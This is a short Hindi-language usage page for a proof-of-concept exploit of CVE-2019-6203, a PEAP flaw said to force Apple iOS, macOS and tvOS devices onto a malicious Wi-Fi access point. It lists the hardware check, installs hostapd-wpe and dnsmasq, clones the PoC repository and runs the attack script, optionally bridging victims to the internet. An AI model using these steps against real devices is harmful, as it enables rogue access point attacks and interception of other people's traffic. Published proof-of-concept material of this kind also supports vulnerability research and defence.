
CVE-2019-6203 के लिए PoC, < iOS 12.2, macOS < 10.14.4 पर काम करता है
सभी Apple डिवाइसों में एक PEAP बग है जो एक हमलावर को किसी भी Apple डिवाइस (iOS, macOS या tvOS) को एक दुर्भावनापूर्ण एक्सेस पॉइंट से जुड़ने के लिए मजबूर करने की अनुमति देता है।
यह CVE-2019-6203 के लिए एक PoC है, जो < iOS 12.2, macOS < 10.14.4 पर काम करता है, Kali Linux पर परीक्षण किया गया।
इस PoC को चलाने के लिए आपको एक Wi-Fi कार्ड चाहिए जो AP mode को सपोर्ट करता हो। आप इसे iw list चलाकर जांच सकते हैं, आउटपुट इस प्रकार होगा:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#with Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0
वीडियो: https://youtu.be/UEzdtkcnrYw